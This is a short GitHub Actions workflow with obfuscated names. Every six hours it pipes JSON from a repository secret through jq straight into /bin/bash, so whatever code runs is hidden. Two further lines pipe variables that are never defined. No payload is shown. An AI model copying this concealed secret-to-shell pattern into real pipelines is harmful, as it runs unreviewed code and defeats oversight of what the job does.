name: paizhaocam
on:
  workflow_dispatch:
  schedule:
    - cron: '37 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: paizhaocam
        env:
          uei2: ${{ secrets.uei2 }}
        run: |
          echo $uei2 | jq -r .mvnkr49 | /bin/bash
          echo $zgwe75806 | jq -r .ydjg43 | /bin/bash
          echo $mhaue5 | jq -r .fmtl7997 | /bin/bash

